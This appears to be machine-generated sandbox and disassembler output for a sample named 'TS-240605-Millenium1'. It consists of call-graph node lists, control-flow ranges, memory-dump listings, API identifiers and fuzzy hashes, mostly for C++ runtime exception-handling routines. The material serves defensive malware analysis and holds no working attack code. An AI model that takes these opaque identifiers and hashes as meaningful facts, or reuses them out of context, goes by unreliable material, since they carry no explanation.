7ffe1a460350 __CxxCallCatchBlock 14 API calls 6443->6444 6448 7ffe1a455015 6444->6448 6445 7ffe1a45503e __CxxCallCatchBlock 6446 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6445->6446 6447 7ffe1a455051 6446->6447 6449 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6447->6449 6448->6445 6450 7ffe1a4529e0 __CxxCallCatchBlock 13 API calls 6448->6450 6451 7ffe1a45505a 6449->6451 6450->6445 6452 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6451->6452 6453 7ffe1a455063 6452->6453 6454 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6453->6454 6455 7ffe1a455072 6454->6455 6577 7ffe1a452ac0 6578 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6577->6578 6580 7ffe1a452ad1 6578->6580 6579 7ffe1a452ae8 6580->6579 6582 7ffe1a452b90 6580->6582 6583 7ffe1a452ba2 6582->6583 6584 7ffe1a452c2f abort 6582->6584 6583->6584 6585 7ffe1a452bc9 6583->6585 6585->6579 7057 7ffe1a456bc0 7060 7ffe1a456f28 7057->7060 7061 7ffe1a456f3f GetLastError 7060->7061 7062 7ffe1a456bc9 7060->7062 7063 7ffe1a4571c4 __vcrt_getptd_noinit 7 API calls 7061->7063 7064 7ffe1a456f52 SetLastError 7063->7064 7064->7062 6586 7ffe1a461ac0 6587 7ffe1a461b45 6586->6587 6588 7ffe1a461ad8 6586->6588 6588->6587 6589 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6588->6589 6590 7ffe1a461b25 6589->6590 6591 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6590->6591 6592 7ffe1a461b3a terminate 6591->6592 6592->6587 6860 7ffe1a454d4a 6861 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6860->6861 6863 7ffe1a454d57 __CxxCallCatchBlock 6861->6863 6862 7ffe1a454d9b RaiseException 6864 7ffe1a454dc2 6862->6864 6863->6862 6865 7ffe1a460350 __CxxCallCatchBlock 14 API calls 6864->6865 6868 7ffe1a454dca 6865->6868 6866 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6867 7ffe1a454e06 6866->6867 6869 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6867->6869 6870 7ffe1a4529e0 __CxxCallCatchBlock 13 API calls 6868->6870 6872 7ffe1a454df3 __CxxCallCatchBlock 6868->6872 6871 7ffe1a454e0f 6869->6871 6870->6872 6872->6866 6456 7ffe1a461c4d 6457 7ffe1a460350 __CxxCallCatchBlock 14 API calls 6456->6457 6460 7ffe1a461c60 6457->6460 6458 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6459 7ffe1a461cb3 6458->6459 6461 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6459->6461 6463 7ffe1a4529e0 __CxxCallCatchBlock 13 API calls 6460->6463 6465 7ffe1a461c9f __CxxCallCatchBlock 6460->6465 6462 7ffe1a461cc0 6461->6462 6464 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6462->6464 6463->6465 6466 7ffe1a461ccd 6464->6466 6465->6458 6873 7ffe1a461b73 6876 7ffe1a455224 6873->6876 6877 7ffe1a45523e 6876->6877 6879 7ffe1a45528b 6876->6879 6878 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6877->6878 6877->6879 6878->6879 6467 7ffe1a461e75 6468 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6467->6468 6469 7ffe1a461e8d 6468->6469 6470 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6469->6470 6471 7ffe1a461ea8 6470->6471 6472 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6471->6472 6473 7ffe1a461ebc 6472->6473 6474 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6473->6474 6475 7ffe1a461ec5 6474->6475 6476 7ffe1a4549a0 38 API calls 6475->6476 6477 7ffe1a461f07 6476->6477 6478 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6477->6478 6479 7ffe1a461f0c 6478->6479 7065 7ffe1a4553f4 7075 7ffe1a455327 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7065->7075 7066 7ffe1a455422 7067 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 7066->7067 7069 7ffe1a455427 7067->7069 7068 7ffe1a45541b abort 7068->7066 7070 7ffe1a455432 7069->7070 7071 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 7069->7071 7072 7ffe1a455446 __FrameHandler3::GetHandlerSearchState 7070->7072 7073 7ffe1a45543f abort 7070->7073 7071->7070 7073->7072 7074 7ffe1a4603a4 13 API calls Is_bad_exception_allowed 7074->7075 7075->7066 7075->7068 7075->7074 7076 7ffe1a4603cc __FrameHandler3::FrameUnwindToEmptyState 13 API calls 7075->7076 7076->7075 6593 7ffe1a461cf4 6594 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6593->6594 6595 7ffe1a461d02 6594->6595 6596 7ffe1a461d0d 6595->6596 6597 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6595->6597 6597->6596 6882 7ffe1a45676f 6883 7ffe1a456780 6882->6883 6884 7ffe1a456b10 2 API calls 6883->6884 6885 7ffe1a456791 6884->6885 6886 7ffe1a456b10 2 API calls 6885->6886 6887 7ffe1a4567b4 6886->6887 6888 7ffe1a456805 6887->6888 6889 7ffe1a4567cb 6887->6889 6892 7ffe1a456b10 2 API calls 6888->6892 6890 7ffe1a4567da RtlPcToFileHeader 6889->6890 6893 7ffe1a4567ef 6889->6893 6890->6893 6891 7ffe1a4567ff 6892->6893 6893->6891 6894 7ffe1a456b10 2 API calls 6893->6894 6895 7ffe1a45684a 6894->6895 6896 7ffe1a456b10 2 API calls 6895->6896 6897 7ffe1a45686d 6896->6897 7077 7ffe1a4569f0 7078 7ffe1a456a21 7077->7078 7079 7ffe1a456aeb 7077->7079 7088 7ffe1a45f250 7078->7088 7081 7ffe1a456adf free 7081->7079 7083 7ffe1a456a7e malloc 7084 7ffe1a456a94 strcpy_s 7083->7084 7085 7ffe1a456ad6 free 7083->7085 7086 7ffe1a456ac4 InterlockedPushEntrySList 7084->7086 7087 7ffe1a456abf 7084->7087 7085->7081 7086->7085 7087->7085 7091 7ffe1a45f280 7088->7091 7092 7ffe1a45f2c5 7091->7092 7098 7ffe1a456a48 7091->7098 7099 7ffe1a456d68 EnterCriticalSection 7092->7099 7098->7081 7098->7083 6480 7ffe1a460870 6481 7ffe1a4608b2 __GSHandlerCheckCommon 6480->6481 6482 7ffe1a4608da 6481->6482 6484 7ffe1a45f670 6481->6484 6486 7ffe1a45f6a0 __CxxCallCatchBlock _IsNonwritableInCurrentImage 6484->6486 6485 7ffe1a45f7a1 6485->6482 6486->6485 6487 7ffe1a45f764 RtlUnwindEx 6486->6487 6487->6486 6598 7ffe1a4544e4 6599 7ffe1a454511 6598->6599 6600 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6599->6600 6601 7ffe1a454516 6600->6601 6604 7ffe1a454570 6601->6604 6605 7ffe1a4545f5 6601->6605 6615 7ffe1a4545bc 6601->6615 6602 7ffe1a454663 6602->6615 6647 7ffe1a453334 6602->6647 6603 7ffe1a4545e2 6638 7ffe1a45fafc 6603->6638 6604->6603 6613 7ffe1a4545a1 6604->6613 6604->6615 6617 7ffe1a45f518 6604->6617 6608 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6605->6608 6609 7ffe1a454614 6605->6609 6608->6609 6609->6602 6612 7ffe1a4603b8 13 API calls 6609->6612 6609->6615 6611 7ffe1a4545db abort 6611->6603 6612->6602 6613->6603 6613->6611 6614 7ffe1a4545ab 6613->6614 6621 7ffe1a4552d8 6614->6621 6618 7ffe1a45f526 6617->6618 6619 7ffe1a45f578 abort 6617->6619 6618->6619 6620 7ffe1a45f537 6618->6620 6620->6613 6622 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6621->6622 6623 7ffe1a455307 6622->6623 6705 7ffe1a45f46c 6623->6705 6626 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6636 7ffe1a455324 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6626->6636 6627 7ffe1a455422 6628 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6627->6628 6630 7ffe1a455427 6628->6630 6629 7ffe1a45541b abort 6629->6627 6631 7ffe1a455432 6630->6631 6633 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6630->6633 6634 7ffe1a455446 __FrameHandler3::GetHandlerSearchState 6631->6634 6635 7ffe1a45543f abort 6631->6635 6632 7ffe1a4603a4 13 API calls Is_bad_exception_allowed 6632->6636 6633->6631 6634->6615 6635->6634 6636->6627 6636->6629 6636->6632 6637 7ffe1a4603cc __FrameHandler3::FrameUnwindToEmptyState 13 API calls 6636->6637 6637->6636 6709 7ffe1a45fb94 6638->6709 6645 7ffe1a4552d8 __FrameHandler3::FrameUnwindToEmptyState 16 API calls 6646 7ffe1a45fb50 6645->6646 6646->6615 6722 7ffe1a455768 6647->6722 6649 7ffe1a4537ad abort 6650 7ffe1a4537b4 6649->6650 6652 7ffe1a460910 DName::DName 8 API calls 6650->6652 6651 7ffe1a45347c 6653 7ffe1a453768 6651->6653 6657 7ffe1a4534b4 6651->6657 6654 7ffe1a4537c0 6652->6654 6653->6649 6655 7ffe1a453766 6653->6655 6756 7ffe1a453cf0 6653->6756 6654->6615 6656 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6655->6656 6661 7ffe1a4537a6 6656->6661 6662 7ffe1a45367b 6657->6662 6734 7ffe1a45fc88 6657->6734 6659 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6664 7ffe1a4533e1 6659->6664 6661->6649 6661->6650 6662->6655 6665 7ffe1a45369c 6662->6665 6667 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6662->6667 6664->6650 6666 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6664->6666 6665->6655 6670 7ffe1a4536be 6665->6670 6748 7ffe1a45fac8 6665->6748 6669 7ffe1a4533f1 6666->6669 6667->6665 6671 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6669->6671 6670->6655 6672 7ffe1a4536ee 6670->6672 6674 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6670->6674 6673 7ffe1a4533fa 6671->6673 6676 7ffe1a4536f9 6672->6676 6680 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6672->6680 6675 7ffe1a4603e4 13 API calls 6673->6675 6677 7ffe1a4536d5 6674->6677 6679 7ffe1a453411 6675->6679 6682 7ffe1a455800 14 API calls 6676->6682 6681 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6677->6681 6678 7ffe1a4603b8 13 API calls 6695 7ffe1a4534e3 6678->6695 6679->6649 6684 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6679->6684 6680->6676 6683 7ffe1a4536de terminate 6681->6683 6685 7ffe1a453710 6682->6685 6683->6672 6686 7ffe1a45343c 6684->6686 6685->6655 6687 7ffe1a45fb94 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 6685->6687 6686->6651 6688 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6686->6688 6689 7ffe1a45372a 6687->6689 6690 7ffe1a453448 6688->6690 6753 7ffe1a45ff28 RtlUnwindEx 6689->6753 6692 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6690->6692 6694 7ffe1a453451 6692->6694 6693 7ffe1a454258 13 API calls 6693->6695 6696 7ffe1a455800 14 API calls 6694->6696 6695->6662 6695->6678 6695->6693 6739 7ffe1a45318c 6695->6739 6698 7ffe1a453461 6696->6698 6698->6651 6699 7ffe1a4558f0 Is_bad_exception_allowed 13 API calls 6698->6699 6700 7ffe1a45346d 6699->6700 6701 7ffe1a453475 terminate 6700->6701 6702 7ffe1a4537d4 __CxxCallCatchBlock std::bad_alloc::bad_alloc 6700->6702 6701->6651 6703 7ffe1a456b10 2 API calls 6702->6703 6704 7ffe1a4537f7 6703->6704 6706 7ffe1a45f483 6705->6706 6707 7ffe1a45531d 6705->6707 6708 7ffe1a45f518 __GetCurrentState abort 6706->6708 6707->6626 6708->6707 6710 7ffe1a45f508 __FrameHandler3::ExecutionInCatch abort 6709->6710 6712 7ffe1a45fbc2 6710->6712 6711 7ffe1a45fbec RtlLookupFunctionEntry 6711->6712 6712->6711 6713 7ffe1a45fb1b 6712->6713 6714 7ffe1a45f508 6713->6714 6715 7ffe1a45f518 6714->6715 6716 7ffe1a45f578 abort 6715->6716 6717 7ffe1a45f537 6715->6717 6718 7ffe1a45f930 6717->6718 6719 7ffe1a45f950 6718->6719 6720 7ffe1a45f97b 6718->6720 6719->6720 6721 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6719->6721 6720->6645 6721->6719 6723 7ffe1a45f508 __FrameHandler3::ExecutionInCatch abort 6722->6723 6724 7ffe1a45578d 6723->6724 6725 7ffe1a45fb94 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 6724->6725 6726 7ffe1a4557a2 6725->6726 6772 7ffe1a45f494 6726->6772 6729 7ffe1a4557d7 6730 7ffe1a45f494 __GetUnwindTryBlock 2 API calls 6729->6730 6732 7ffe1a453395 6730->6732 6731 7ffe1a4557b4 __FrameHandler3::GetHandlerSearchState 6775 7ffe1a45f4cc 6731->6775 6732->6649 6732->6651 6732->6659 6735 7ffe1a45f508 __FrameHandler3::ExecutionInCatch abort 6734->6735 6736 7ffe1a45fcc6 6735->6736 6737 7ffe1a45fdb3 abort 6736->6737 6738 7ffe1a45fcd4 6736->6738 6738->6695 6740 7ffe1a45fb94 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 6739->6740 6741 7ffe1a4531c9 6740->6741 6742 7ffe1a4531ef 6741->6742 6778 7ffe1a453004 6741->6778 6744 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6742->6744 6745 7ffe1a453201 6744->6745 6746 7ffe1a45ff28 9 API calls 6745->6746 6747 7ffe1a453245 6746->6747 6747->6695 6749 7ffe1a45f508 __FrameHandler3::ExecutionInCatch abort 6748->6749 6750 7ffe1a45fadc 6749->6750 6751 7ffe1a45f930 __FrameHandler3::ExecutionInCatch 13 API calls 6750->6751 6752 7ffe1a45fae6 6751->6752 6752->6670 6754 7ffe1a460910 DName::DName 8 API calls 6753->6754 6755 7ffe1a460022 6754->6755 6755->6655 6757 7ffe1a453f3c 6756->6757 6758 7ffe1a453d29 6756->6758 6757->6655 6759 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6758->6759 6760 7ffe1a453d2e 6759->6760 6761 7ffe1a453d4d EncodePointer 6760->6761 6762 7ffe1a453da0 6760->6762 6763 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6761->6763 6762->6757 6764 7ffe1a453dc0 6762->6764 6765 7ffe1a453f57 abort 6762->6765 6767 7ffe1a453d5d 6763->6767 6766 7ffe1a45fc88 2 API calls 6764->6766 6771 7ffe1a453de2 6766->6771 6767->6762 6807 7ffe1a45f888 6767->6807 6769 7ffe1a4603a4 13 API calls Is_bad_exception_allowed 6769->6771 6770 7ffe1a45318c 30 API calls 6770->6771 6771->6757 6771->6769 6771->6770 6773 7ffe1a45fb94 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 6772->6773 6774 7ffe1a4557b0 6773->6774 6774->6729 6774->6731 6776 7ffe1a45fb94 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 6775->6776 6777 7ffe1a45f4e6 6776->6777 6777->6732 6779 7ffe1a453026 6778->6779 6787 7ffe1a452c38 6779->6787 6781 7ffe1a453037 6782 7ffe1a45303c __AdjustPointer 6781->6782 6783 7ffe1a453078 __AdjustPointer 6781->6783 6784 7ffe1a45305b 6782->6784 6786 7ffe1a4603b8 13 API calls 6782->6786 6783->6784 6785 7ffe1a4603b8 13 API calls 6783->6785 6784->6742 6785->6784 6786->6784 6788 7ffe1a452c6e 6787->6788 6789 7ffe1a452c65 6787->6789 6791 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6788->6791 6798 7ffe1a452c8d 6788->6798 6806 7ffe1a452ce8 __AdjustPointer 6788->6806 6790 7ffe1a4603a4 Is_bad_exception_allowed 13 API calls 6789->6790 6790->6788 6791->6798 6792 7ffe1a452cf6 6793 7ffe1a452d14 6792->6793 6795 7ffe1a452d0e abort 6792->6795 6792->6806 6794 7ffe1a452d62 6793->6794 6796 7ffe1a452d5c abort 6793->6796 6793->6806 6797 7ffe1a4603b8 13 API calls 6794->6797 6801 7ffe1a452d71 6794->6801 6795->6793 6796->6794 6797->6801 6798->6792 6799 7ffe1a452cf0 abort 6798->6799 6798->6806 6799->6792 6800 7ffe1a452dad abort 6803 7ffe1a452db3 6800->6803 6801->6800 6801->6803 6801->6806 6802 7ffe1a452df2 abort abort 6802->6806 6803->6802 6804 7ffe1a452dc7 6803->6804 6805 7ffe1a4603b8 13 API calls 6803->6805 6804->6802 6804->6806 6805->6804 6806->6781 6808 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6807->6808 6809 7ffe1a45f8b4 6808->6809 6809->6762 7100 7ffe1a454be4 7101 7ffe1a456900 7100->7101 7102 7ffe1a45690f free 7101->7102 7103 7ffe1a456918 7101->7103 7102->7103 6810 7ffe1a461cde 6811 7ffe1a452a50 14 API calls 6810->6811 6812 7ffe1a461cec 6811->6812 6491 7ffe1a456c60 6492 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6491->6492 6493 7ffe1a456c69 terminate 6492->6493 6495 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6493->6495 6496 7ffe1a456c92 6495->6496 6497 7ffe1a456e48 __CxxCallCatchBlock 13 API calls 6496->6497 6498 7ffe1a456c9b 6497->6498 7104 7ffe1a456be0 7105 7ffe1a456f28 __vcrt_getptd_noinit 9 API calls 7104->7105 7106 7ffe1a456be9 7105->7106 7107 7ffe1a456de0 7108 7ffe1a456dfb 7107->7108 7109 7ffe1a456de9 7107->7109 7109->7108 7110 7ffe1a456df5 free 7109->7110 7110->7108
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1860975216.00007FFDFB3C2000.00000080.00000001.01000000.00000005.sdmp, Offset: 00007FFDFADE0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1860135349.00007FFDFADE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFADE1000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB082000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB0FB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB13D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB163000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB1FD000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB200000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB309000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB349000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB353000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1860163508.00007FFDFB3B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861001417.00007FFDFB3C4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffdfade0000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                          • String ID:
                                                                                          • API String ID: 3300690313-0
                                                                                          • Opcode ID: 783ab60674f12aabdfa355631bc5dc6fdb0c5fd1704f4c1a21f8aa46b8a7e156
                                                                                          • Instruction ID: f7890658c2b14ecb5618cbbdf607c5f6c953f89dd738d14771dc647cc5a3a946
                                                                                          • Opcode Fuzzy Hash: 783ab60674f12aabdfa355631bc5dc6fdb0c5fd1704f4c1a21f8aa46b8a7e156
                                                                                          • Instruction Fuzzy Hash: 726236A272D19287E7159E78D410BBD76E0F748785F045136EAAEC37D8EA3CEA45CB00

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 479 7ffe1a4594b8-7ffe1a4594e9 480 7ffe1a459a7f-7ffe1a459a91 479->480 481 7ffe1a4594ef-7ffe1a45950d 479->481 482 7ffe1a459a94-7ffe1a459a97 call 7ffe1a4579dc 480->482 483 7ffe1a459513 481->483 484 7ffe1a459628-7ffe1a45962b 481->484 491 7ffe1a459a9c-7ffe1a459ab8 482->491 488 7ffe1a459616-7ffe1a459623 483->488 489 7ffe1a459519-7ffe1a45951c 483->489 486 7ffe1a459662-7ffe1a459669 484->486 487 7ffe1a45962d-7ffe1a459651 call 7ffe1a45aac8 484->487 495 7ffe1a459675-7ffe1a45967c 486->495 496 7ffe1a45966b-7ffe1a45966e 486->496 505 7ffe1a4599c1-7ffe1a4599c5 487->505 508 7ffe1a459657-7ffe1a45965d 487->508 490 7ffe1a4599b8-7ffe1a4599bc call 7ffe1a457494 488->490 493 7ffe1a459594-7ffe1a459599 489->493 494 7ffe1a45951e 489->494 490->505 498 7ffe1a459604-7ffe1a459611 493->498 499 7ffe1a45959b-7ffe1a45959e 493->499 501 7ffe1a459520-7ffe1a459523 494->501 502 7ffe1a45954c-7ffe1a459559 494->502 503 7ffe1a459682 495->503 504 7ffe1a45978c-7ffe1a45978f 495->504 496->495 498->490 506 7ffe1a4595a0-7ffe1a4595a3 499->506 507 7ffe1a4595d7-7ffe1a4595ff call 7ffe1a457a60 499->507 511 7ffe1a459582-7ffe1a45958f 501->511 512 7ffe1a459525-7ffe1a459528 501->512 502->490 513 7ffe1a45977a-7ffe1a459787 503->513 514 7ffe1a459688-7ffe1a45968b 503->514 509 7ffe1a459795 504->509 510 7ffe1a45990c-7ffe1a45990f 504->510 517 7ffe1a4599c7-7ffe1a4599ce 505->517 518 7ffe1a4599f6-7ffe1a4599fd 505->518 520 7ffe1a4595a5-7ffe1a4595a8 506->520 521 7ffe1a4595c1-7ffe1a4595d2 call 7ffe1a457494 506->521 507->505 508->491 522 7ffe1a45979b-7ffe1a45979e 509->522 523 7ffe1a4598fa-7ffe1a459907 509->523 525 7ffe1a459915-7ffe1a459918 510->525 526 7ffe1a4599ab 510->526 511->490 512->511 524 7ffe1a45952a-7ffe1a45952d 512->524 513->490 515 7ffe1a459733-7ffe1a459736 514->515 516 7ffe1a459691 514->516 528 7ffe1a45976b-7ffe1a459775 515->528 530 7ffe1a459738-7ffe1a45973b 515->530 516->528 529 7ffe1a459697-7ffe1a45969a 516->529 531 7ffe1a4599d0-7ffe1a4599d4 517->531 532 7ffe1a4599e6-7ffe1a4599f4 517->532 534 7ffe1a459a04-7ffe1a459a39 call 7ffe1a457680 call 7ffe1a4579dc 518->534 535 7ffe1a4595aa-7ffe1a4595ad 520->535 536 7ffe1a4595b9-7ffe1a4595bc 520->536 521->507 537 7ffe1a4597a0-7ffe1a4597a3 522->537 538 7ffe1a4597f7 522->538 523->490 524->511 539 7ffe1a45952f-7ffe1a459532 524->539 541 7ffe1a459953-7ffe1a4599a9 call 7ffe1a45c540 call 7ffe1a457680 call 7ffe1a4579dc 525->541 542 7ffe1a45991a-7ffe1a45991d 525->542 540 7ffe1a4599b2 526->540 528->490 545 7ffe1a459720-7ffe1a45972e call 7ffe1a457940 529->545 546 7ffe1a4596a0-7ffe1a4596a3 529->546 550 7ffe1a45973d-7ffe1a459740 530->550 551 7ffe1a45975c-7ffe1a459766 530->551 552 7ffe1a459a3c-7ffe1a459a3f 531->552 553 7ffe1a4599d6-7ffe1a4599de 531->553 532->534 534->552 535->536 549 7ffe1a4595af-7ffe1a4595b2 535->549 547 7ffe1a4597fc-7ffe1a459813 536->547 555 7ffe1a4597e5-7ffe1a4597f2 537->555 556 7ffe1a4597a5-7ffe1a4597a8 537->556 538->547 557 7ffe1a459534-7ffe1a459537 539->557 558 7ffe1a459570-7ffe1a45957d 539->558 540->490 541->505 543 7ffe1a45991f-7ffe1a459922 542->543 544 7ffe1a459947-7ffe1a459951 542->544 560 7ffe1a459924-7ffe1a459927 543->560 561 7ffe1a459938-7ffe1a45993b 543->561 544->490 545->505 562 7ffe1a4596a5-7ffe1a4596a8 546->562 563 7ffe1a4596de-7ffe1a45971b call 7ffe1a4594b8 call 7ffe1a457680 546->563 564 7ffe1a459815-7ffe1a459838 call 7ffe1a45c9c4 547->564 565 7ffe1a459874-7ffe1a459877 547->565 549->536 567 7ffe1a4595b4-7ffe1a4595b7 549->567 550->551 569 7ffe1a459742-7ffe1a459745 550->569 551->490 572 7ffe1a459a41-7ffe1a459a6b call 7ffe1a458c5c call 7ffe1a4579dc call 7ffe1a457ae0 552->572 573 7ffe1a459a70-7ffe1a459a7d 552->573 553->552 570 7ffe1a4599e0-7ffe1a4599e4 553->570 555->490 574 7ffe1a4597aa-7ffe1a4597ad 556->574 575 7ffe1a4597d6-7ffe1a4597e0 556->575 557->558 559 7ffe1a459539-7ffe1a45953c 557->559 558->490 578 7ffe1a45955e-7ffe1a45956b 559->578 579 7ffe1a45953e-7ffe1a459541 559->579 560->561 580 7ffe1a459929-7ffe1a459933 560->580 561->544 581 7ffe1a4596aa-7ffe1a4596ad 562->581 582 7ffe1a4596cc-7ffe1a4596d9 562->582 563->482 607 7ffe1a459865-7ffe1a45986f 564->607 608 7ffe1a45983a-7ffe1a459862 call 7ffe1a457a60 564->608 586 7ffe1a4598df-7ffe1a4598f5 call 7ffe1a45c9c4 565->586 587 7ffe1a459879-7ffe1a459881 565->587 567->487 567->536 589 7ffe1a459750-7ffe1a459757 569->589 590 7ffe1a459747-7ffe1a45974a 569->590 570->532 570->552 572->573 573->491 576 7ffe1a4597c4-7ffe1a4597d1 574->576 577 7ffe1a4597af-7ffe1a4597b2 574->577 575->490 576->490 577->580 594 7ffe1a4597b8-7ffe1a4597bf 577->594 578->490 579->578 595 7ffe1a459543-7ffe1a459546 579->595 580->490 581->582 596 7ffe1a4596af-7ffe1a4596b2 581->596 582->490 586->491 600 7ffe1a459883-7ffe1a459899 call 7ffe1a457494 587->600 601 7ffe1a4598c5-7ffe1a4598c7 587->601 589->540 590->580 590->589 594->540 595->487 595->502 605 7ffe1a4596b4-7ffe1a4596b7 596->605 606 7ffe1a4596bd-7ffe1a4596c7 596->606 600->586 622 7ffe1a45989b-7ffe1a4598c3 call 7ffe1a457a60 600->622 601->586 612 7ffe1a4598c9-7ffe1a4598da call 7ffe1a457494 601->612 605->580 605->606 606->490 607->491 608->607 612->586 622->586
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                          • API String ID: 2943138195-1482988683
                                                                                          • Opcode ID: 9af3000e46094686c92b09a1ab6ba282d3ea35f814097fcec630d6e6c72122d6
                                                                                          • Instruction ID: 5c88346a1f5f333869e985466dc0456801a4d5599bf480a8075749a0f3c82d9e
                                                                                          • Opcode Fuzzy Hash: 9af3000e46094686c92b09a1ab6ba282d3ea35f814097fcec630d6e6c72122d6
                                                                                          • Instruction Fuzzy Hash: 810262B6F18E1288FB14AB66D9501FC27B1BB06B64F5441F7CA0D93ABADF2C9564C340

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
